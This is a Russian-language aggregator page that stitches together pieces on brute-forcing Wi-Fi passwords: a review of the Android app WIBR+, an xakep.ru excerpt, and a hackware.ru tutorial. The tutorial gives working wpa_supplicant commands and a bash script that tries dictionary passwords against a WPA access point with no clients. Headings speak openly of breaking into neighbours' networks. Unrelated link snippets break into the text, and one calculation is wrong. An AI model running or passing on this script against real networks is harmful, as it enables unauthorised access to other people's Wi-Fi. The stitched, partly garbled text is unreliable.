Лучшие программы для брутфорса Wi-Fi

WIBR+ WIfi BRuteforce hack — уникальное приложение для тестирования безопасности WiFi сетей. Оно поможет подобрать и сгенерировать пароля для подключения, проверит его безопасность. Интерфейс приложения прост и понятен. Оно состоит из двух частей: Bruteforce и Dictionary.

Первая позволяет работать с паролями напрямую, подбирая их вручную, автоматически или при помощи специальных масок. Разумеется, что это может занят довольно продолжительное время, ведь количество пассвордов растет по экспоненте в зависимости от их длины. Отлично, если известна какая-нибудь часть пароля, тогда поиск упрощается. Для этого и используют маску — она позволяет перебирать только недостающие символы.

Вторая содержит словарь самых распространённых паролей (вроде 12345 или password) и примеры, которые могут генерироваться автоматически. Словари для этой программы существуют разные, количество паролей в них велико, поэтому вероятность получения доступа к сети WiFi достаточно высока. Так же там присутствуют пассворды, часто присваемые системой автоматически.

#ИзиХак Пентестим Wi-Fi пароль за 5 минут | Router Scan

Программа работает с такими ключами:

В отличие от многих других приложений подобного рода ВИБР действительно работает, в чем легко убедится скачав его на любое андроид устройство. Скорость подбора пассвордов будет зависеть от нескольких факторов, основные из которых это расстояние между вашим девайсом и роутером (мощность сигнала) и железо. На более мощных устройствах процесс протекает быстрее.

Программа предоставляет возможность замены предустановленных словарей на пользовательские или кастомные. Для этого следует проделать такие манипуляции:

1. Открыть программу архив (zip);

2. Зайти в папку res/raw. Там находятся стандартные словари.

3. Измените или замените словари.

Как ни странно, приложение не требует прав суперпользователя — это несомненный плюс. Минус в том, что пока программа не русифицирована и пользователь может довольствоваться только английской версией. Предупреждаем: используйте приложение только относительно к собственным сетям! Взлом чужого WiFi — нелегален! Последнюю версию приложения WIBR+ WIfi BRuteforce hack на андроид скачать.

Источник: top-android.org

Брут на ходу. Атакуем беспроводные сети простым и эффективным способом

Ата­ки на Wi-Fi чрез­вычай­но раз­нооб­разны: зло­умыш­ленник может попытать­ся взло­мать кли­ент­ские устрой­ства и точ­ки дос­тупа, да и пос­ледние могут исполь­зовать раз­ные про­токо­лы и методы аутен­тифика­ции. В этой статье мы рас­смот­рим прос­той, но эффектив­ный метод брут­форса бес­про­вод­ных сетей.

info

Эта статья — часть серии пуб­ликаций о прак­тичес­ких при­емах взло­ма и атак с исполь­зовани­ем под­ручных устрой­ств, которые мож­но соб­рать дома. В этих матери­алах мы рас­кры­ваем прос­тые спо­собы получе­ния несан­кци­они­рован­ного дос­тупа к защищен­ной информа­ции и показы­ваем, как ее огра­дить от подоб­ных атак. Пре­дыду­щая статья серии: «Ме­гад­рон. Стро­им хакер­ский бес­пилот­ник — даль­нобой­ный и с защитой от глу­шилок».

Ломаем соседский Wi-Fi. Актуален ли Router Scan в 2018? Как им пользоваться?

warning

Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

Читайте также:
Зарядки в программе вот такое утро

На­ибо­лее час­то встре­чают­ся сети WPA PSK. Даже если в ком­пании исполь­зуют­ся сети WPA-Enterprise, а все осталь­ное зап­рещено, мы всег­да можем най­ти WPA PSK бла­года­ря тем же бес­про­вод­ным прин­терам и вся­чес­ким несан­кци­они­рован­ным точ­кам дос­тупа, работа­ющим на телефо­нах сот­рудни­ков. И чем боль­ше периметр ком­пании, тем боль­ше таких потен­циаль­ных точек вхо­да мож­но обна­ружить. При ата­ках на точ­ки дос­тупа с WPA PSK обыч­но исполь­зует­ся сле­дующая схе­ма.

Классическая схема действий при атаках WPA PSK

Но что делать, если у точ­ки дос­тупа нет кли­ентов? Гру­бо говоря, где‑то у полови­ны обна­ружен­ных бес­про­вод­ных сетей будут отсутс­тво­вать активные кли­енты, а дру­гая полови­на не будет под­верже­на PMKID, и у таких сетей не обна­ружит­ся уяз­вимый к перебо­ру WPS. Выходит, подоб­ные точ­ки дос­тупа устой­чивы к ата­кам, даже если на них исполь­зует­ся пароль 12345678? А что нам меша­ет ата­ковать их?

Онлайновый брутфорс с использованием wpa_supplicant

По­доб­рать пароль к обыч­ной WPA-сети всег­да мож­но прос­тым перебо­ром, аутен­тифици­руясь и спра­шивая каж­дый раз пароль непос­редс­твен­но у точ­ки дос­тупа (этот метод называ­ется онлайн‑брут­форсом).

Ата­ки онлайн‑под­бором пароля к Wi-Fi-сетям край­не ред­ки, и в интерне­те мож­но най­ти не так уж мно­го реали­заций такой ата­ки. Оно и понят­но: ведь ее ско­рость низ­кая в срав­нении с брут­форсом того же WPA Handshake или PMKID. Но имен­но эта ата­ка может быть единс­твен­но воз­можной поч­ти в чет­верти слу­чаев.

И пусть ско­рость под­бора будет не так высока, это явно луч­ше, чем сидеть и ждать у моря погоды. Так ли нуж­на нам высокая ско­рость брут­форса, ког­да речь идет о небезо­пас­ных паролях? Мож­но пред­положить, что при­мер­но на каж­дой десятой точ­ке дос­тупа исполь­зован прес­ловутый пароль 12345678. Неуже­ли для ата­ки подоб­ных устрой­ств нужен хен­дшейк?

Брутфорс онлайн в ширину (много точек доступа, несколько паролей)

А что, если мы возь­мем с десяток самых сла­бых паролей? Реали­зовать онлайн‑брут­форс мы можем дос­таточ­но прос­то с помощью скрип­та на Bash, исполь­зуя лишь wpa_supplicant :

Источник: xakep.ru

HackWare.ru

Этичный хакинг и тестирование на проникновение, информационная безопасность

Брут-форс ключей для ненастроенных сетей на 5 ГГц

При анализе больших объёмов раскрытых ключей для беспроводных точек доступа (в том числе с программой Router Scan by Stas’M), было сделано одно интересное наблюдение: многие владельцы двухдиапазонных ТД не догадываются о существовании второго диапазона на 5 ГГц. В зависимости от модели роутера, второй диапазон на 5 ГГц может быть включён или отключён по умолчанию. Если он включён по умолчанию, то диапазон на 5 ГГц имеет свой собственный дефолтный пароль. Эти пароли построены по одному принципу, который зависит от модели роутера. Например, для всех роутеров одной модели могут быть восемь заглавных букв.

Возможно ли брутфорсить подключение Wi-Fi?

Да, можно не захватывать рукопожатия, а просто подбирать пароли к беспроводной точке доступа. Причём, сделать это намного проще — даже не нужны никакие специальные программы. Но это никто и никогда не использует, поскольку невероятно низкая скорость. Максимально скорость, при тестировании одной сетевой картой, достигает 15×60×24=21600 кандидатов паролей в сутки.

Читайте также:
К растровым редакторам относятся программы

При этом при взломе рукопожатия скорость на средней мобильной графической карте достигает 40 тысяч кандидатов паролей в секунду (!). При такой скорости за сутки можно перебрать 40000×60×60×24=2160021600 (это два миллиарда с хвостиком) кандидатов паролей. На сколько порядков различаются эти цифры мне считать уже лень.

Ну и тем не менее, запасной вариант никогда не будет лишним. Преимуществом подбора пароля напрямую, без захвата рукопожатия, является то, что возможен взлом точки доступа Wi-Fi даже если к ней никогда не подключаются клиенты.

Брутфорсить можно не только двухдиапазонный ТД с 5 ГГц. Брутфорсить можно любую точку доступа. Но если у ТД включён диапазон 5 ГГц с дефолтный названием сети, то почти наверняка там и заводской пароль. Эти пароли могут быть на каждом роутере разные, но алгоритм их генерирования для одной модели всегда один.

Это отдельная задача — узнать модель роутера и собрать образцы паролей для неё, чтобы сгенерировать словарь с кандидатами в пароли. Для каждой модели роутера её нужно решать индивидуально, поэтому останавливаться на этом мы не будем. Перейдём непосредственно к механизму брутфорсинга.

Подключение к сети Wi-Fi из командной строки

Алгоритм брутфорсинга подключения Wi-Fi без захвата рукопожатий чрезвычайно прост:

  • пытаемся подключиться с кандидатом в пароли
  • проверяем, произошло ли подключение
  • если подключения нет, то переходим к первому пункту с новым кандидатом в пароли

Самое главное уметь подключаться к Wi-Fi из командной строки. Давайте рассмотрим, как это делается. Нам нужен пакет wpa_supplicant.

В Kali Linux (а также Debian, Mint, Ubuntu) он ставится так:

sudo apt-get install wpasupplicant

А в BlackArch так:

sudo pacman -S wpa_supplicant —needed

У нас ничего не получиться, если мы не остановим (выгрузим / отключим) службу NetworkManager. В Kali Linux это делается так:

sudo service NetworkManager stop

А в BlackArch так:

sudo systemctl stop NetworkManager

Примечание, после отключения NetworkManager пропадёт Интернет!

Нам нужно сформировать конфигурационный файл. Делается это командой:

wpa_passphrase название_ТД пароль > конфигурационный_файл

К примеру, для ТД Kitty пароль 0805646143 и конфигурационный файл я хочу назвать wpa_Kitty.conf, тогда команда имеет следующий вид:

wpa_passphrase Kitty 0805646143 > wpa_Kitty.conf

Должен создаться файл с примерно таким содержимым:

network=

Теперь нам нужно узнать имя беспроводного сетевого интерфейса. Это делается командой:

iw dev

В моём случае это wlp2s0:

У вас может быть другое. Поэтому во всех последующих командах заменяйте wlp2s0 на имя вашего беспроводного сетевого интерфейса.

Подключение к Wi-Fi из командной строки делается так:

sudo wpa_supplicant -B -i wlp2s0 -c wpa_Kitty.conf

Здесь -B означает перевести процесс в фон. После ключа -i wlp2s0 указывается имя беспроводного интерфейса. А после ключа -c wpa_Kitty.conf указывается конфигурационный файл.

Если что-то идёт не так, то эту же команду запускайте без ключа -B, чтобы посмотреть подробный её вывод.

Чтобы заработал Интернет, нужно выполнить ещё эту команду:

sudo dhclient wlp2s0

Но ещё до неё можно проверить, есть ли «коннект» командой:

iw dev wlp2s0 link

Если подключение произошло, то вывод будет как на скриншоте выше, т. е.

Если подключения нет, то вывод будет намного лаконичнее:

Читайте также:
Программа для составления схемы земельного участка для предварительного согласования

Not connected.

Брутфорс Wi-Fi без захвата рукопожатий

Переходим, собственно, к брутфорсу.

Давайте попробуем подключиться с заведомо неверным паролем:

Отлично, если пароль неверный, то в выводе присутствует строка WRONG_KEY. Отфильтруем вывод:

sudo wpa_supplicant -i wlp2s0 -c wpa_Kitty.conf | grep ‘WRONG_KEY’

Давайте создадим тестовый словарик:

maskprocessor pass?d?d?d?d > dict.txt

И куда-нибудь в нём вставим правильный пароль.

Теперь набросаем скриптик для автоматизации процесса (сохраните его в файл brut_wpa.sh):

#!/bin/bash FILE=’dict.txt’; AP=’Kitty’; Interface=’wlp2s0′; while read -r line echo ‘Тестируем пароль: ‘$line do wpa_passphrase $AP $line > wpa_$AP.conf t=`timeout 4 sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep ‘WRONG_KEY’` if [ -z «$t» ] then echo ‘Пароль подобран. Это: ‘$line exit fi done
sudo sh brut_wpa.sh

Правильный пароль я разместил почти в самое начало, поэтому результат получил быстро:

Давайте рассмотрим скрипт поподробнее. Здесь в строках

FILE=’dict.txt’; AP=’Kitty’; Interface=’wlp2s0′;

Указываются, соответственно, файл словаря, название ТД и имя беспроводного интерфейса.

Используется сброс по таймауту timeout 4. Если уменьшать эту величину, то увеличивается вероятность ложных срабатываний. Если увеличивать, то уменьшается скорость перебора.

Кстати, ещё можно анализировать результаты не по ошибкам подключения, а искать удачные подключения:

sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep ‘completed’`

Тогда скрипт приобретает вид:

#!/bin/bash FILE=’dict.txt’; AP=’Kitty’; Interface=’wlp2s0′; while read -r line echo ‘Тестируем пароль: ‘$line do wpa_passphrase $AP $line > wpa_$AP.conf t=`timeout 4 sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep ‘completed’` if [ «$t» ] then echo ‘Пароль подобран. Это: ‘$line exit fi done

Скрипт хорошо работает:

Скорость аналогичная, но из-за проблем у ТД можно пропустить валидный пароль. С первым скриптом валидный пароль пропустить нельзя — но возможно ложное срабатывание на невалидный пароль.

Величину таймаута рекомендуется тестировать — вполне возможно, что для ТД, которую вы брутфорсите, оптимальной величиной будет не 4 секунды, а какое-то другое число.

Заключение

Описанная здесь альтернатива, несмотря на свои негативные характеристики (низкая скорость и необходимость всегда быть рядом со взламываемой ТД), имеет уникальное преимущество — возможен взлом без наличия клиентов у ТД, А при определённых обстоятельствах, когда удастся значительно сузить количество кандидатов в пароли, она может привести к успеху. Отдельно необходимо тестировать возможно ли увеличение скорости взлома при задействовании нескольких беспроводных сетевых интерфейсов.

Ещё одно интересное преимущество по сравнению с «традиционными» методами взлома — не требуется особенная Wi-Fi карта. Нам не нужен режим монитора и возможность делать инъекции. От нашей Wi-Fi карты требуется только одно — возможность подключаться к беспроводным точкам доступа, а это умеет делать абсолютно любая из них.

Связанные статьи:

  • WiFi-autopwner 2: инструкция по использованию и обзор новых функций (86%)
  • Быстрый, простой и рабочий способ обхода Captive Portal (hotspot с авторизацией на web-интерфейсе) (84.2%)
  • WiFi-autopwner: скрипт для автоматического поиска и аудита Wi-Fi сетей с низкой безопасностью (82.5%)
  • Решение проблемы: Reaver показывает WPS пин, но не показывает пароль WPA-PSK (82.5%)
  • Автоматизированная атака Pixie Dust: получение ПИНов и паролей Wi-Fi без ввода команд (82.5%)
  • Автоматизированный взлом Wi-FI WEP с Besside-ng и Wesside-ng (RANDOM — 66.1%)

Источник: hackware.ru

Рейтинг
( Пока оценок нет )
Загрузка ...
EFT-Soft.ru